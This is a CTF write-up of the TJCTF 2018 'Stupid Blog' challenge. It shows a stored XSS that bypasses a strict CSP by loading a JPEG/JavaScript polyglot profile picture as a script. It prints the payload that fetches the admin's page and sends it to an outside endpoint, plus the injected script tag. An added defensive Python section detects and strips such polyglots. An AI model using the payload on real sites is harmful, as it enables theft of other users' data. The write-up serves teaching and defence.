Stupid Blog

TJCTF 2018 - Web (130 pts).

TJCTF 2018: Stupid Blog

Challenge details

Event       Challenge    Category  Points  Solves
TJCTF 2018  Stupid Blog  Web       130     22


Author: okulkarni

I created this blog site, but it doesn’t do much. I did hide a flag on here though. Maybe you can convince the admin user to give it to you?


Stupid Blog was a stored XSS challenge in which the CSP has to be bypassed using a polyglot JPEG file.


Find the XSS

Once on the website, you have two options: register and log in. So I created an account and logged in.


After logging in, three more options appear: upload a profile picture (JPEG/PNG), write a post on your “blog”, and report a user. Because I had seen a similar challenge in EasyCTF (Fumblr), I immediately thought of XSS.


So I tested an XSS payload in a post: it was injected into the page unescaped, but not executed, because of the very strict CSP:


content-security-policy: default-src 'self'

Now I knew that I needed to bypass the CSP to execute JavaScript on my profile page, so that when I report my account to the admin, his browser executes it.

Bypass the CSP

Since we have an image upload and a strict CSP to bypass, I thought of Gareth Heyes' PortSwigger article on exactly that: a JPEG that is also valid JavaScript. So I reused his PoC image to bypass the CSP.

Among other things, his PoC contains this JavaScript:

*/=alert("Burp rocks.");/*

I replaced it with my payload:

*/=x=new XMLHttpRequest();x.open("GET","admin",false);x.send(null);document.location=""+x.responseText;/*

The payload will force the admin to GET his blog page and send the entire content to

Next, we need to use the XSS to load our polyglot JPEG as a script. To do so, I posted <script charset="ISO-8859-1" src="ggg/pfp"></script> on my blog: the profile picture is served from the same origin, so 'self' allows it as a script source.
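As an added, defender-side example that is not part of the original write-up (my own code, not the challenge's): a small Python module showing how the upload endpoint could have blocked both the polyglot image and the `<script src="ggg/pfp">` trick. It walks the JPEG marker structure, flags the two things this polyglot technique relies on (the first segment's length bytes reading `/*`, and script-looking text inside an APPn/COM segment), re-emits the image with every metadata segment replaced by a clean JFIF APP0, and returns the response headers that make a browser refuse to run an image as a script. The sample input is constructed inline and is not a real picture; the marker layouts follow the JPEG spec, the token list is my own heuristic, and `X-Content-Type-Options: nosniff` is the standard header, not something from the challenge.

```python
import struct

# JPEG marker codes (the byte following 0xFF).
SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
APP_MARKERS = range(0xE0, 0xF0)            # APP0..APP15: JFIF, EXIF, XMP, ...
STANDALONE = {0x01, *range(0xD0, 0xD8)}    # TEM, RST0..RST7 carry no length field

# Canonical 16-byte JFIF APP0 that replaces whatever APP segments the upload carried.
CLEAN_APP0 = b"\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"


def parse_segments(data: bytes):
    """Walk the marker segments up to SOS.

    Returns (segments, scan): segments is a list of (marker, payload) without the
    2-byte length field; scan is the raw bytes from SOS to EOI, copied verbatim.
    Raises ValueError on structural inconsistencies, which is reason enough to
    reject an upload.
    """
    if data[:2] != b"\xFF\xD8":
        raise ValueError("missing SOI: not a JPEG")
    pos, segments = 2, []
    while True:
        if pos + 4 > len(data) or data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == SOS:
            if data[-2:] != b"\xFF\xD9":
                raise ValueError("missing EOI")
            return segments, data[pos:]
        if marker in STANDALONE:
            raise ValueError(f"unexpected standalone marker 0x{marker:02X} before SOS")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError(f"segment 0x{marker:02X} length {length} overruns the file")
        segments.append((marker, data[pos + 4:pos + 2 + length]))
        pos += 2 + length


def is_valid_jpeg(data: bytes) -> bool:
    """True if the marker structure parses cleanly; never raises."""
    try:
        parse_segments(data)
        return True
    except ValueError:
        return False


def metadata_findings(data: bytes) -> list:
    """Heuristic indicators that an upload is a JPEG/JavaScript polyglot.

    The technique reused in the write-up needs the first segment's two length bytes
    to read "/*" (0x2F2A) so a JS engine sees a comment opener, and it hides the
    script in an APPn/COM segment. Both are cheap to spot (token list is my own).
    """
    findings = []
    if data[4:6] == b"/*":
        findings.append(("first-segment-length-is-comment-opener", "/*"))
    for marker, payload in parse_segments(data)[0]:
        if marker in APP_MARKERS or marker == COM:
            for token in (b"*/", b"/*", b"alert(", b"XMLHttpRequest", b"document."):
                if token in payload:
                    findings.append((marker, token.decode("ascii")))
    return findings


def strip_metadata(data: bytes) -> bytes:
    """Re-emit the JPEG with every APPn/COM segment replaced by one clean JFIF APP0.

    Only segments a decoder needs (DQT, DHT, SOFn, DRI, ...) and the scan survive,
    so a script hidden in metadata does not.
    """
    segments, scan = parse_segments(data)
    out = bytearray(b"\xFF\xD8" + CLEAN_APP0)
    for marker, payload in segments:
        if marker in APP_MARKERS or marker == COM:
            continue
        out += bytes((0xFF, marker)) + struct.pack(">H", len(payload) + 2) + payload
    out += scan
    return bytes(out)


def upload_response_headers() -> dict:
    """Headers for serving user uploads so the browser refuses to run them as script.

    With nosniff, a <script src=...> whose response is image/jpeg is not executed,
    which closes the hole even if a polyglot slips past the sanitiser.
    """
    return {
        "Content-Type": "image/jpeg",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def build_sample(script: bytes) -> bytes:
    """Constructed test fixture (not a real image): structurally valid JPEG whose APP0
    length bytes are "/*" and whose APP0 body carries `script`."""
    app0_len = 0x2F2A                                   # the length bytes spell "/*"
    body = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + script
    app0 = b"\xFF\xE0" + struct.pack(">H", app0_len) + body.ljust(app0_len - 2, b"\x00")
    dqt = b"\xFF\xDB\x00\x43\x00" + bytes(range(1, 65))            # one 8-bit quant table
    sof0 = b"\xFF\xC0\x00\x0B\x08\x00\x01\x00\x01\x01\x01\x11\x00"  # 1x1 px, 1 component
    sos = b"\xFF\xDA\x00\x08\x01\x01\x00\x00\x3F\x00"               # scan header
    return b"\xFF\xD8" + app0 + dqt + sof0 + sos + b"\x12\x34" + b"\xFF\xD9"


if __name__ == "__main__":
    sample = build_sample(b'*/ alert("constructed") /*')
    print("findings:", metadata_findings(sample))
    clean = strip_metadata(sample)
    print("after strip:", metadata_findings(clean), "size:", len(clean))
```

Stripping metadata is only belt-and-braces: the decisive fix for this challenge is `X-Content-Type-Options: nosniff` on everything served from the upload path, together with hosting uploads on a separate origin so that `default-src 'self'` never covers them as a script source.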

The last step was to report my user to the admin and wait for him to visit my profile.


After a few minutes, the admin's browser sent a request to my beeceptor endpoint \o7


It contained the whole admin page, and the flag was in it.